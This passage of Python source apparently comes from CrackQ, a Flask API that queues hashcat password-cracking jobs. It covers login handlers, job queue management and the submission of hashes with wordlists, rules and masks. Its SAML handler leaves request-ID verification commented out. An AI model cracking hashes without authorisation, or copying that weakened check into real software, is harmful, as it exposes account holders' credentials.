job_details[job_details.rfind('[')+1:job_details.rfind(']')].strip() rules_list = [rule.strip().rstrip("'").lstrip("'") for rule in rules_split.split(',')] else: rules_list = None deets_split = job_details[job_details.rfind('(')+1:job_details.rfind(')')].split(',') for deets in deets_split: deet = deets.split('=')[0].strip(' ') if deet in deet_match_list: deets_dict[deet] = deets.strip().split('=')[1].strip().rstrip("'").lstrip("'") if 'Benchmark' in job_details: return deets_dict if rules_list: 
rule_names = [] for key, rule in dict(CRACK_CONF['rules']).items(): if rule in rules_list: rule_names.append(key) deets_dict['rules'] = rule_names else: deets_dict['rules'] = None if 'mask' in deets_dict: if deets_dict['mask']: mask = deets_dict['mask'] for key, mask_file in dict(CRACK_CONF['masks']).items(): if mask in mask_file: deets_dict['mask'] = key if 'wordlist' in deets_dict: if deets_dict['wordlist']: wordlist = deets_dict['wordlist'] for key, word in dict(CRACK_CONF['wordlists']).items(): if wordlist in word: deets_dict['wordlist'] = key break else: deets_dict['wordlist'] = None if 'wordlist2' in deets_dict: wordlist = deets_dict['wordlist2'] for key, word in dict(CRACK_CONF['wordlists']).items(): if wordlist in word: deets_dict['wordlist2'] = key break else: deets_dict['wordlist2'] = None return deets_dict def add_jobid(job_id): """Add job_id to job_ids column in user table""" user = User.query.filter_by(username=current_user.username).first() if user.job_ids: logger.debug('Current registered job_ids: {}'.format(user.job_ids)) jobs = json.loads(user.job_ids) else: logger.debug('No job_ids registered with current user') jobs = None logger.debug('Registering new job_id to current user: {}'.format(job_id)) if isinstance(jobs, list): if job_id not in jobs: jobs.append(job_id) else: logger.warning('job_id already registered to user: {}'.format(job_id)) else: jobs = [job_id] user.job_ids = json.dumps(jobs) db.session.commit() logger.debug('user.job_ids: {}'.format(user.job_ids)) def del_jobid(job_id): """Delete job_id from job_ids column in user table""" with crackq.app.app_context(): for user in User.query.all(): if user.job_ids and job_id in user.job_ids: jobs = json.loads(user.job_ids) logger.debug('Registered jobs: {}'.format(jobs)) if isinstance(jobs, list): logger.debug('Unregistering job_id: {}'.format(job_id)) if job_id in jobs: jobs.remove(job_id) user.job_ids = json.dumps(jobs) db.session.commit() logger.debug('user.job_ids: 
{}'.format((user.job_ids))) return True else: logger.error('Error removing job_id') else: logger.debug('Job ID not registered with user') return False def check_jobid(job_id): """Check user owns the job_id""" logger.debug('Checking job_id: {} belongs to user: {}'.format( job_id, current_user.username)) user = User.query.filter_by(username=current_user.username).first() if user.job_ids: if job_id in user.job_ids: return True else: return False else: return False def check_rules(orig_rules): """ Check provided rules list is sane Arguments --------- orig_rules: list List of rules to check Returns ------- rules: list List of rules or False if any are invalid """ logger.debug('Checking rules valid') try: if orig_rules is None: rules = None elif isinstance(orig_rules, list): rules = [] for rule in orig_rules: if rule in CRACK_CONF['rules']: logger.debug('Using rules file: {}'.format(CRACK_CONF['rules'][rule])) rules.append(CRACK_CONF['rules'][rule]) else: logger.debug('Invalid rules provided') rules = False except KeyError: logger.debug('Invalid rules provided') rules = False return rules def check_mask(orig_masks): """ Check provided mask file list is sane Arguments --------- orig_masks: list List of mask files to check Returns ------- mask_files: list List of mask files or False if any are invalid """ logger.debug('Checking mask files are valid') try: if orig_masks is None: mask_file = None elif isinstance(orig_masks, list): mask_file = [] for mask in orig_masks: if mask in CRACK_CONF['masks']: #mask_name = CRACK_CONF['masks'][mask] logger.debug('Using mask file: {}'.format(mask)) mask_file.append(CRACK_CONF['masks'][mask]) return mask_file if len(mask_file) > 0 else None else: logger.debug('Invalid mask file provided') return False except KeyError: logger.debug('Invalid mask file provided') return False # this is just set to use the first mask file in the list for now #mask = mask_file[0] if mask_file else mask def admin_required(func): @wraps(func) def wrap(*args, 
**kwargs): """Decorator to check user is admin""" try: logger.debug('User authenticating {}'.format(current_user.username)) if current_user.is_admin: return func(*args, **kwargs) except AttributeError as err: logger.debug(err) logger.debug('Anonymous user cant be admin') return abort(401) return wrap def create_user(username, email=None, password=None): """ Adds a new user to the SQLAlchemy datastore Arguments --------- username: string Username to create Returns ------- result: boolean True/False indicating status of delete operation """ if User.query.filter_by(username=username).first(): logger.debug('User already exists') return False else: user = User(username=username, email=email, password=password, is_admin=False) db.session.add(user) db.session.commit() logger.debug('New user added') return True def del_user(user_id): """ Delete a user from the SQLAlchemy datastore Arguments --------- user_id: int User ID number for the user to delete Returns ------- result: boolean True/False indicating status of delete operation """ try: user = User.query.filter_by(id=user_id).first() db.session.delete(user) db.session.commit() return True except AttributeError: return False except exc.UnmappedInstanceError: return False def email_check(email): """ Simple regex check string is an email address Arguments -------- email: str email address string to check Returns ------- match: boolean true/false for valid email match """ regex = r'^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$' if re.search(regex, email): logger.debug('Email address found') return True else: return False def del_job(job): """ Function to delete a job. 
Used to spawn a thread and wait for jobs to cleanup hashcat proc """ time.sleep(22) logger.debug('Thread: deleting job') job.delete() del_jobid(job.id) @login_manager.user_loader def load_user(user_id): """user_loader function requried as part of Flask login-manager""" return User.query.filter_by(username=user_id).first() class Sso(MethodView): """ SAML2 Single Sign On Class Login class handles saml sso authentication responses from IDP, validates authenticity and authenticates if successful. """ def __init__(self): if CRACK_CONF['auth']['type'] == 'saml2': self.meta_url = CRACK_CONF['auth']['saml_manifest'] self.meta_file = CRACK_CONF['auth']['meta_file'] self.entity_id = CRACK_CONF['auth']['entity_id'] self.group = CRACK_CONF['auth']['group'] self.saml_auth = auth.Saml2(self.meta_url, self.meta_file, self.entity_id) self.saml_client = self.saml_auth.s_client() def get(self): """ Login mechanism, using GET to redirect to SAML IDP. """ if CRACK_CONF['auth']['type'] == 'saml2': self.reqid, info = self.saml_client.prepare_for_authenticate() redirect_url = None for key, value in info['headers']: if key == 'Location': redirect_url = value response = redirect(redirect_url, code=302) return response else: return jsonify(ERR_METH_NOT), 405 @csrf.exempt def post(self): """ Handle returned SAML reponse """ if not CRACK_CONF['auth']['type'] == 'saml2': return jsonify(ERR_METH_NOT), 405 ###***validate ###***readd/fix reqid verification saml_resp = request.form['SAMLResponse'] logger.debug('SAML SSO reponse received:\n {}'.format(saml_resp)) try: saml_parse = self.saml_client.parse_authn_request_response(saml_resp, BINDING_HTTP_POST) except sigver.SignatureError as err: return 'Invalid Signature', 500 except saml2.validate.ResponseLifetimeExceed as err: return 'Invalid SAML Request', 500 #if saml_parse.in_response_to not in self.reqid: # 'Unsolicited authentication response', 500 if saml_parse.authn_statement_ok(): user_info = saml_parse.ava.items() groups = [] for key, val in 
user_info: if 'name' in key: username = val[0] if 'email' in key: email = val[0] else: email = None if self.group and 'Group' in key: groups = val if self.group: if len(groups) > 0: if self.group not in groups: logger.debug('User authorised, but not in valid domain group') return 'User is not authorised to use this service', 401 else: logger.debug('No groups returned in SAML response') return 'User is not authorised to use this service', 401 #try: # username #except UnboundLocalError: # return {'msg': 'No user returned in SAML response'}, 500 logger.debug('Authenticated: {}'.format(username)) user = load_user(username) if user: crackq.app.session_interface.regenerate(session) else: if email_check(email): create_user(username, email=email) else: create_user(username) user = load_user(username) if isinstance(user, User): crackq.app.session_interface.regenerate(session) login_user(user) else: logger.error('No user object loaded') return jsonify(ERR_BAD_CREDS), 401 return redirect('/') else: ###***add error output to debug logger.debug('Login error') return jsonify(ERR_BAD_CREDS), 401 class Login(MethodView): """ Authentication handler Login class handles authentication, it's protocol agnostic and just needs the 'authenticate' fucntion to provide a 'Success' or 'Failure' result. The 'authenticate' function can use any supported protocols or a custom protocol can be created. """ def post(self): """ Login mechanism, using POST. 
Supply the following in the body: {"user": "xxx", "password": "xxx"} """ try: marsh_schema = parse_json_schema().load(request.json) args = marsh_schema except ValidationError as errors: logger.debug('Validation error: {}'.format(errors)) return errors.messages, 500 if CRACK_CONF['auth']['type'] == 'ldap': username = args['user'] password = args['password'] if not username: return jsonify({"msg": "Missing username parameter"}), 400 if not password: return jsonify({"msg": "Missing password parameter"}), 400 ldap_uri = CRACK_CONF['auth']['ldap_server'] ldap_base = CRACK_CONF['auth']['ldap_base'] auther = auth.Ldap() authn = auther.authenticate(ldap_uri, username, password, ldap_base=ldap_base) logger.debug('LDAP reply: {}'.format(authn)) if authn[0] == "Success": logger.debug('Authenticated: {}'.format(username)) user = load_user(username) if user: crackq.app.session_interface.regenerate(session) login_user(user) else: if len(authn) > 1: email = authn[1] else: email = username if email_check(email): logger.debug('Email address found, using for notify') create_user(username, email=email) else: create_user(username) user = load_user(username) if isinstance(user, User): crackq.app.session_interface.regenerate(session) login_user(user) else: logger.error('No user object loaded') return jsonify(ERR_BAD_CREDS), 401 return 'OK', 200 elif authn[0] == "Invalid Credentials": return jsonify(ERR_BAD_CREDS), 401 else: logger.debug('Login error: {}'.format(authn)) return jsonify(ERR_BAD_CREDS), 401 if CRACK_CONF['auth']['type'] == 'sql': user = User.query.filter_by(username=args['user']).first() if isinstance(user, User): if bcrypt.check_password_hash(user.password, args['password']): crackq.app.session_interface.regenerate(session) login_user(user) return 'OK', 200 return jsonify(ERR_BAD_CREDS), 401 else: return jsonify(ERR_METH_NOT) class Logout(MethodView): """ Session Logout Class to logout and clear flask session cookie """ @login_required def get(self): logger.debug('User 
logged out: {}'.format(current_user.username)) user = User.query.filter_by(username=current_user.username).first() crackq.app.session_interface.destroy(session) user.active = False db.session.commit() logout_user() return 'Logged Out', 200 class Queuing(MethodView): """ Class to interact with the crackqueue module This will instantiate a crackqueue instance and use it to manage jobs in the Redis queue using RQ """ def __init__(self): self.crack_q = crackqueue.Queuer() self.q = self.crack_q.q_connect() rconf = CRACK_CONF['redis'] self.log_dir = CRACK_CONF['files']['log_dir'] self.redis_con = Redis(rconf['host'], rconf['port']) self.req_max = CRACK_CONF['misc']['req_max'] self.speed_q = Queue('speed_check', connection=self.redis_con, serializer=JSONSerializer) def zombie_check(self, started, failed, cur_list): """ This method will check and remove zombie jobs from the started queue. RQ has a bug which causes multiple started jobs to exist after a system error has occured (unplanned exeception of some sort). This method will clean this up and requeus the affected job. """ logger.debug('Checking for zombie jobs') while len(started.get_job_ids()) > 1: logger.debug('Zombie job detected') logger.debug('Started jobs: {}'.format(cur_list)) hung_dict = {} for j in cur_list: job = self.q.fetch_job(j) if job is not None: hung_dict[j] = job.started_at latest = max(hung_dict, key=hung_dict.get) for j in cur_list: if j != latest: job = self.q.fetch_job(j) if job: job.set_status('failed') failed.add(job) logger.debug('Cleaning state job: {}'.format(j)) started.remove(job) try: if job.meta['Requeue Count'] <= int(self.req_max): failed.requeue(j) job.meta['Requeue Count'] += 1 job.save_meta() except KeyError: job.meta['Requeue Count'] = 0 def get_comp_dict(self, comp_list, session=False): """ Function to get complete queue information Arguments --------- comp_list: list list of job IDs in complete queue session: string session ID to reduce returned dictionary to jobs owned by user. 
Returns ------- comp_dict: dictionary dict containing high-level info for jobs in complete queue """ comp_dict = {} for job_id in comp_list: if session: if check_jobid(job_id): job = self.q.fetch_job(job_id) else: job = None else: job = self.q.fetch_job(job_id) if job: comp_dict[job_id] = {} job_deets = get_jobdetails(job.description) try: if isinstance(job.meta['HC State'], dict): cracked = str(job.meta['HC State']['Cracked Hashes']) total = str(job.meta['HC State']['Total Hashes']) comp_dict[job_id]['Cracked'] = '{}/{}'.format(cracked, total) comp_dict[job_id]['Running Time'] = job.meta['HC State']['Running Time'] try: comp_dict[job_id]['Name'] = get_jobdetails(job.description)['name'] except KeyError: comp_dict[job_id]['Name'] = 'No name' except AttributeError: comp_dict[job_id]['Name'] = 'No name' except KeyError: logger.debug('No HC state, checking state file') job_file = valid.val_filepath(path_string=self.log_dir, file_string='{}.json'.format(job_id)) try: with open(job_file, 'r') as jobfile_fh: job_deets = json.loads(jobfile_fh.read().strip()) comp_dict[job_id]['Name'] = job_deets['name'] cracked = job_deets['Cracked Hashes'] total = job_deets['Total Hashes'] comp_dict[job_id]['Cracked'] = '{}/{}'.format(cracked, total) comp_dict[job_id]['Running Time'] = '0' except FileNotFoundError as err: logger.debug('Failed to open job file: {}'.format(err)) except Exception as err: logger.debug('Failed to open job file: {}'.format(err)) else: logger.error('Job is missing: {}'.format(job_id)) return comp_dict @login_required def get(self, job_id): """ Method to get job status job_id: str hex reprisentation of uuid job ID Returns ------ """ time_now = datetime.now().strftime("%Y-%m-%d %H:%M") time_now = datetime.strptime(time_now, '%Y-%m-%d %H:%M') current_user.last_seen = time_now db.session.commit() ###***re-add this for validation? 
#args = marsh_schema.data started = rq.registry.StartedJobRegistry(queue=self.q) failed = rq.registry.FailedJobRegistry(queue=self.q) cur_list = started.get_job_ids() ###**update all connections to user get_current_connection()?? self.zombie_check(started, failed, cur_list) q_dict = self.crack_q.q_monitor(self.q) logger.debug('Current jobs: {}'.format(cur_list)) failed_dict = self.crack_q.check_failed(self.q) comp_list = self.crack_q.check_complete(self.q) last_comp = [] end_times = {} if len(comp_list) > 0: ###***make this a function/method for j in comp_list: if check_jobid(j): job = self.q.fetch_job(j) if job: ended = job.ended_at if ended: end_times[j] = ended if len(end_times) > 0: latest = max(end_times, key=end_times.get) else: latest = None if latest: job = self.q.fetch_job(latest) else: job = None if job: try: job_name = get_jobdetails(job.description)['name'] except KeyError: job_name = 'No name' except AttributeError: job_name = 'No name' # just a single job for now last_comp = [{'job_name': job_name, 'job_id': latest}] else: last_comp = [{'job_name': 'None'}] q_dict['Last Complete'] = last_comp logger.debug('Completed jobs: {}'.format(comp_list)) logger.debug('q_dict: {}'.format(q_dict)) if not job_id.isalnum(): return jsonify(ERR_INVAL_JID), 500 if job_id == 'all': ###***definitely make these a function if len(cur_list) > 0: job = self.q.fetch_job(cur_list[0]) if current_user.job_ids and job: if cur_list[0] in json.loads(current_user.job_ids): job.meta['email_count'] = 0 job.save() if job: if 'HC State' in job.meta: ###***remove this? 
if isinstance(job.meta['HC State'], dict): job_details = get_jobdetails(job.description) try: q_dict['Current Job'][cur_list[0]]['Job Details'] = job_details except KeyError: logger.error('No job to update - does not exist') else: logger.error('No Queue') if len(q_dict) > 0: for qjob_id in q_dict['Queued Jobs']: job = self.q.fetch_job(qjob_id) job_details = get_jobdetails(job.description) q_dict['Queued Jobs'][qjob_id]['Job Details'] = job_details return jsonify(q_dict), 200 elif job_id == 'failed': return jsonify(failed_dict), 200 elif job_id == 'failedless': failess_dict = {} for job_id in failed_dict: if check_jobid(job_id): failess_dict[job_id] = failed_dict[job_id] return jsonify(failess_dict), 200 elif job_id == 'complete': comp_dict = {} comp_dict = self.get_comp_dict(comp_list, session=False) return jsonify(comp_dict), 200 elif job_id == 'completeless': comp_dict = {} comp_dict = self.get_comp_dict(comp_list, session=True) return jsonify(comp_dict), 200 else: try: marsh_schema = parse_json_schema().load({'job_id': job_id}) job_id = marsh_schema['job_id'].hex except ValidationError as errors: logger.debug('Validation error: {}'.format(errors)) return errors.messages, 500 if check_jobid(job_id): job = self.q.fetch_job(job_id) if job: cracked_file = '{}{}.cracked'.format(self.log_dir, job_id) job_details = get_jobdetails(job.description) if job_id in q_dict['Queued Jobs']: job_dict = { 'Status': 'Queued', 'Time started': None, 'Time finished': None, 'Job Details': job_details, 'Result': job.result, 'HC State': job.meta, } else: job_dict = { 'Status': job.get_status(), 'Time started': str(job.started_at), 'Time finished': str(job.ended_at), 'Job Details': job_details, 'Result': job.result, 'HC State': job.meta, } try: with open(cracked_file, 'r') as cracked_fh: job_dict['Cracked'] = [crack.strip() for crack in cracked_fh] except IOError as err: logger.debug('Cracked file does not exist: {}'.format(err)) return jsonify(job_dict), 200 else: return abort(404) 
else: return abort(401) @login_required def put(self, job_id): """ Method to reorder the queue This will clear the queued jobs and re-add them in the order specified with a JSON batch add jobord_dict: dict Dictionary containing batch job add details as: {job_id: place} job_id: str hex representation of uuid job ID place: int indicating place in queue Returns ------ """ try: marsh_schema = parse_json_schema().load(request.json) except ValidationError as errors: logger.debug('Validation error: {}'.format(errors)) return jsonify({'msg': errors.messages}), 500 comp = rq.registry.FinishedJobRegistry(queue=self.q) ###***change this to match reports, validate job_id correctly if job_id == "reorder": logger.debug('Reorder queue command received') logger.debug(marsh_schema['batch_job']) try: adder = Adder() for job in marsh_schema['batch_job']: job_id = job['job_id'] if adder.session_check(self.log_dir, job_id): logger.debug('Valid session found') started = rq.registry.StartedJobRegistry(queue=self.q) cur_list = started.get_job_ids() if job_id in cur_list: logger.error('Job is already running') return {'msg': 'Job is already running'}, 500 marsh_schema['batch_job'].sort(key=itemgetter('place')) for job in self.q.jobs: job.set_status('finished') job.save() comp.add(job, -1) job.cleanup(-1) for job in marsh_schema['batch_job']: Queue.dequeue_any(self.q, None, connection=self.redis_con, serializer=JSONSerializer) j = self.q.fetch_job(job['job_id']) ###***check this covers case when job is in requeued state self.q.enqueue_job(j) j.meta['CrackQ State'] = 'Run/Restored' j.save_meta() return {'msg': 'Queue order updated'}, 200 except Exception as err: ###***fix to specific exception types logger.error('Reorder failed: {}'.format(err)) return {'msg': 'Reorder failed'}, 500 @login_required def patch(self, job_id): """ Method to stop/remove a job from the active queue to complete and cancel current hashcat job if it's already running Arguments --------- job_id: str hex reprisentation 
of uuid job ID Returns ------ HTTP 204 """ try: marsh_schema = parse_json_schema().load({'job_id': job_id}) job_id = marsh_schema['job_id'].hex except ValidationError as errors: logger.debug('Validation error: {}'.format(errors)) return errors.messages, 500 try: logger.debug('Stopping job: {:s}'.format(job_id)) job = self.q.fetch_job(job_id) started = rq.registry.StartedJobRegistry(queue=self.q) cur_list = started.get_job_ids() comp = rq.registry.FinishedJobRegistry(queue=self.q) if job_id in cur_list: job.meta['CrackQ State'] = 'Stop' job.save_meta() return 'Stopping Job: Sending signal to Hashcat', 204 else: job.set_status('finished') job.save() comp.add(job, -1) job.cleanup(-1) Queue.dequeue_any(self.q, None, connection=self.redis_con, serializer=JSONSerializer) return 'Stopped Job', 200 except AttributeError as err: logger.debug('Failed to stop job: {}'.format(err)) return jsonify(ERR_INVAL_JID), 404 @login_required def delete(self, job_id): """ Method to remove a job from the queue completely and cancel current hashcat job if it's already running. 
This will remove all trace of the job Arguments --------- job_id: str hex reprisentation of uuid job ID Returns ------ HTTP 200 or 204 depending on what state job is in """ try: marsh_schema = parse_json_schema().load({'job_id': job_id}) job_id = marsh_schema['job_id'].hex except ValidationError as errors: logger.debug('Validation error: {}'.format(errors)) return errors.messages, 500 try: logger.debug('Deleting job: {:s}'.format(job_id)) job = self.q.fetch_job(job_id) started = rq.registry.StartedJobRegistry(queue=self.q) cur_list = started.get_job_ids() speed_session = '{}_speed'.format(job_id) speed_job = self.speed_q.fetch_job(speed_session) if speed_job: logger.debug('Deleting Speed Job') speed_job.meta['CrackQ State'] = 'Delete' speed_job.save_meta() if speed_job.get_status() != 'started': speed_job.delete() if job_id in cur_list: job.meta['CrackQ State'] = 'Delete' job.save_meta() del_thread = threading.Thread(target=del_job, args=(job,)) del_thread.start() return {'msg': 'Deleted Job'}, 204 del_jobid(job_id) job.delete() started.cleanup() return {'msg': 'Deleted Job'}, 200 except AttributeError as err: logger.error('Failed to delete job: {}'.format(err)) return jsonify(ERR_INVAL_JID), 404 class Options(MethodView): """ Class for pulling option information, such as a list of available rules and wordlists """ def __init__(self): self.crack_q = crackqueue.Queuer() self.q = self.crack_q.q_connect() rconf = CRACK_CONF['redis'] self.redis_con = Redis(rconf['host'], rconf['port']) @login_required def get(self): """ Method to get config information Returns ------ hc_dict: dictionary crackq config options for rules/wordlists """ hc_rules = [rule for rule in CRACK_CONF['rules']] hc_words = [word for word in CRACK_CONF['wordlists']] hc_maskfiles = [maskfile for maskfile in CRACK_CONF['masks']] hc_modes = dict(hash_modes.HModes.modes_dict()) hc_att_modes = { '0': 'Straight', '1': 'Combination', '3': 'Brute-Force', '6': 'Hybrid Wordlist + Mask', '7': 'Hybrid Mask + 
Wordlist', } if 'jobtimeout' in CRACK_CONF: timeout_info = CRACK_CONF['jobtimeout'] else: timeout_info = { 'Value': 1814400, 'Modify': False, } hc_dict = { 'Rules': hc_rules, 'Wordlists': hc_words, 'Mask Files': hc_maskfiles, 'Hash Modes': hc_modes, 'Attack Modes': hc_att_modes, 'timeout': timeout_info, } return hc_dict, 200 class Adder(MethodView): """ Separate class for adding jobs """ def __init__(self): self.crack_q = crackqueue.Queuer() self.q = self.crack_q.q_connect() self.log_dir = CRACK_CONF['files']['log_dir'] rconf = CRACK_CONF['redis'] self.redis_con = Redis(rconf['host'], rconf['port']) self.speed_q = Queue('speed_check', connection=self.redis_con, serializer=JSONSerializer) def mode_check(self, mode): """ Mode to check supplied hash mode is supported by Hashcat Arguments --------- mode: int hashcat mode number to check Returns ------- mode: int/boolean returns mode if found else false """ modes_dict = dict(hash_modes.HModes.modes_dict()) logger.debug('Checking hash mode is supported: {}'.format(mode)) if str(mode) in modes_dict.keys(): return int(mode) else: return False def get_restore(self, log_dir, job_id): """ Get restore number from CrackQ json status file Arguments --------- log_dir: str log directory job_id: str job ID string Returns ------- restore: int Restore number to be used with hashcat skip returns 0 on error """ logger.debug('Checking for restore value') if job_id.isalnum(): job_file = valid.val_filepath(path_string=self.log_dir, file_string='{}.json'.format(job_id)) logger.debug('Using session file: {}'.format(job_file)) try: with open(job_file) as fh_job_file: try: status_json = json.loads(fh_job_file.read()) logger.debug('Restoring job details: {}'.format(status_json)) #restore = status_json['Restore Point'] return status_json except IOError as err: logger.warning('Invalid job ID: {}'.format(err)) return False except TypeError as err: logger.warning('Invalid job ID: {}'.format(err)) return False except IOError as err: 
logger.warning('Restore file Error: {}'.format(err)) return False #except json.decoder.JSONDecodeError as err: ###***make explicit except Exception as err: logger.warning('Restore file Error: {}'.format(err)) return False else: logger.warning('Invalid job ID') return False def session_check(self, log_dir, job_id): """ Check for existing session and return the ID if present else False Arguments --------- log_dir: str directory containing cracker log and session files job_id: str job/session id string (alnum) Returns ------- sess_id: bool True if session/job ID is valid and present """ logger.debug('Checking for existing session') log_dir = Path(log_dir) sess_id = False if job_id.isalnum(): try: #files = [f for f in Path.iterdir(log_dir)] for f in Path.iterdir(log_dir): if job_id in str(f): sess_id = True break except ValueError as err: logger.debug('Invalid session ID: {}'.format(err)) sess_id = False except Exception as err: logger.warning('Invalid session: {}'.format(err)) sess_id = False else: logger.debug('Invalid session ID provided') sess_id = False if sess_id is not False: logger.debug('Existing session found') return sess_id def speed_check(self, q_args=None): """ Method to run initial speed/show check in hashcat This will get information related to estimated speed for brain enablement, but also check for any quick wins in the pot file before the job actually gets to the top of the queue. It takes the job ID queues a separate job in a separate queue that will pause any current hashcat jobs and briefly run the speed/show checks, then resumes the job. 
####***UPDATE THIS DOCUMENTATION Arguments --------- job_id: uuid Job ID to update Returns ------ ret: boolean Success/Fail """ logger.debug('Running speed check') if q_args: speed_args = {} speedq_args = {} speed_args['hash_file'] = q_args['kwargs']['hash_file'] speed_session = '{}_speed'.format(q_args['kwargs']['session']) speed_args['speed_session'] = speed_session speed_args['session'] = q_args['kwargs']['session'] speed_args['wordlist'] = q_args['kwargs']['wordlist'] speed_args['wordlist2'] = q_args['kwargs']['wordlist2'] speed_args['hash_mode'] = q_args['kwargs']['hash_mode'] speed_args['username'] = q_args['kwargs']['username'] speed_args['name'] = q_args['kwargs']['name'] speed_args['brain'] = q_args['kwargs']['brain'] speed_args['attack_mode'] = q_args['kwargs']['attack_mode'] speed_args['mask'] = '?a?a?a?a?a?a' if q_args['kwargs']['mask'] else None speed_args['pot_path'] = q_args['kwargs']['pot_path'] speedq_args['kwargs'] = speed_args speedq_args['job_id'] = speed_session self.crack_q.q_add(self.speed_q, speedq_args, timeout=400) logger.debug('Queuing speed check') return True return False @login_required def post(self): """ Method to post a new job to the queue job_id: str hex representation of uuid job ID Returns ------ boolean True/False success failure HTTP_status: int HTTP status, 201 or 500 """ try: marsh_schema = parse_json_schema().load(request.json) args = marsh_schema except ValidationError as errors: logger.debug('Validation error: {}'.format(errors)) return errors.messages, 500 try: job_id = args['job_id'].hex except KeyError as err: logger.debug('No job ID provided') job_id = None except AttributeError as err: logger.debug('No job ID provided') job_id = None # Check for existing session info ###***make this a method if job_id: if job_id.isalnum(): if self.session_check(self.log_dir, job_id): logger.debug('Valid session found') started = rq.registry.StartedJobRegistry(queue=self.q) cur_list = started.get_job_ids() q_dict = 
self.crack_q.q_monitor(self.q) if job_id in cur_list: logger.error('Job is already running') return jsonify({'msg': 'Job is already running'}), 500 if job_id in q_dict['Queued Jobs'].keys(): logger.error('Job is already queued') return jsonify({'msg': 'Job is already queued'}), 500 outfile = str(valid.val_filepath(path_string=self.log_dir, file_string='{}.cracked'.format(job_id))) hash_file = str(valid.val_filepath(path_string=self.log_dir, file_string='{}.hashes'.format(job_id))) pot_path = str(valid.val_filepath(path_string=self.log_dir, file_string='crackq.pot')) job_deets = self.get_restore(self.log_dir, job_id) job = self.q.fetch_job(job_id) # lgtm if not job_deets: logger.debug('Job restor error. Never started') return jsonify({'msg': 'Error restoring job'}), 500 elif not job_deets['restore']: logger.debug('Job not previously started, restore = 0') job_deets['restore'] = 0 elif job_deets['restore'] == 0: logger.debug('Job not previously started, restore = 0') wordlist = None wordlist2 = None rules = None if 'wordlist' in job_deets: if job_deets['wordlist'] in CRACK_CONF['wordlists']: wordlist = CRACK_CONF['wordlists'][job_deets['wordlist']] if 'wordlist2' in job_deets: if job_deets['wordlist2']: if job_deets['wordlist2'] in CRACK_CONF['wordlists']: wordlist2 = CRACK_CONF['wordlists'][job_deets['wordlist2']] if 'rules' in job_deets: rules = check_rules(job_deets['rules']) if rules is False: return jsonify({'msg': 'Invalid rules selected'}), 500 mask_file = check_mask(job_deets['mask']) # this is just set to use the first mask file in the list for now mask = mask_file if mask_file else job_deets['mask'] try: ###***make this (timeout - running time) for restored jobs?? 
timeout = job_deets['timeout'] except KeyError as err: logger.warning('No timeout info in job details, using default') timeout = 1814400 hc_args = { 'hash_file': hash_file, 'session': job_id, 'wordlist': wordlist, 'wordlist2': wordlist2, 'mask': mask, 'mask_file': True if mask_file else False, 'attack_mode': int(job_deets['attack_mode']), 'hash_mode': int(job_deets['hash_mode']), 'outfile': outfile, 'rules': rules, 'restore': job_deets['restore'], 'username': job_deets['username'] if 'user' in job_deets else None, 'increment': job_deets['increment'] if 'increment' in job_deets else None, 'increment_min': job_deets['increment_min'] if 'increment_min' in job_deets else None, 'increment_max': job_deets['increment_max'] if 'increment_max' in job_deets else None, 'brain': False if 'disable_brain' in job_deets else True, 'name': job_deets['name'] if 'name' in job_deets else None, 'pot_path': pot_path, } job = self.q.fetch_job(job_id) job.meta['CrackQ State'] = 'Run/Restored' job.save_meta() else: return jsonify(ERR_INVAL_JID), 500 else: return jsonify(ERR_INVAL_JID), 500 else: logger.debug('Creating new session') job_id = uuid.uuid4().hex add_jobid(job_id) outfile = str(valid.val_filepath(path_string=self.log_dir, file_string='{}.cracked'.format(job_id))) hash_file = str(valid.val_filepath(path_string=self.log_dir, file_string='{}.hashes'.format(job_id))) pot_path = str(valid.val_filepath(path_string=self.log_dir, file_string='crackq.pot')) try: attack_mode = int(args['attack_mode']) except TypeError: attack_mode = None try: logger.debug('Writing hashes to file: {}'.format(hash_file)) with open(hash_file, 'w') as hash_fh: for hash_l in args['hash_list']: hash_fh.write(hash_l.rstrip() + '\n') except KeyError as err: logger.debug('No hash list provided: {}'.format(err)) return jsonify({'msg': 'No hashes provided'}), 500 except IOError as err: logger.debug('Unable to write to hash file: {}'.format(err)) return jsonify({'msg': 'System error'}), 500 try: args['hash_mode'] 
check_m = self.mode_check(args['hash_mode']) except KeyError: check_m = False logger.debug('Hash mode check: {}'.format(check_m)) ###***change to if check_m if check_m is not False: try: mode = int(check_m) except TypeError as err: logger.error('Incorrect type supplied for hash_mode:' '\n{}'.format(err)) return jsonify({'msg': 'Invalid hash mode selected'}), 500 else: return jsonify({'msg': 'Invalid hash mode selected'}), 500 if attack_mode != 3: if args['wordlist'] in CRACK_CONF['wordlists']: wordlist = CRACK_CONF['wordlists'][args['wordlist']] else: return jsonify({'msg': 'Invalid wordlist selected'}), 500 if attack_mode == 1: if 'wordlist2' in args: if args['wordlist2'] in CRACK_CONF['wordlists']: wordlist2 = CRACK_CONF['wordlists'][args['wordlist2']] else: return jsonify({'msg': 'Combinator mode requires 2 wordlists'}), 500 else: wordlist2 = None try: mask_file = check_mask(args['mask_file']) except KeyError: mask_file = None try: mask = args['mask'] except KeyError: mask = None ####***this is just set to use the first mask file in the list for now mask = mask_file[0] if mask_file else mask rules = check_rules(args['rules']) if rules is False: return {'msg': 'Invalid rules selected'}, 500 try: username = args['username'] except KeyError as err: logger.debug('Username value not provided') username = False try: increment = args['increment'] except KeyError as err: logger.debug('Increment value not provided') increment = False try: increment_min = args['increment_min'] except KeyError as err: logger.debug('Increment min value not provided') increment_min = None try: increment_max = args['increment_max'] except KeyError as err: logger.debug('Increment max value not provided') increment_max = None try: if args['disable_brain']: logger.debug('Brain disabled') brain = False else: brain = True except KeyError as err: logger.debug('Brain not disabled: {}'.format(err)) brain = True try: name = args['name'] except KeyError as err: logger.debug('Name value not provided') 
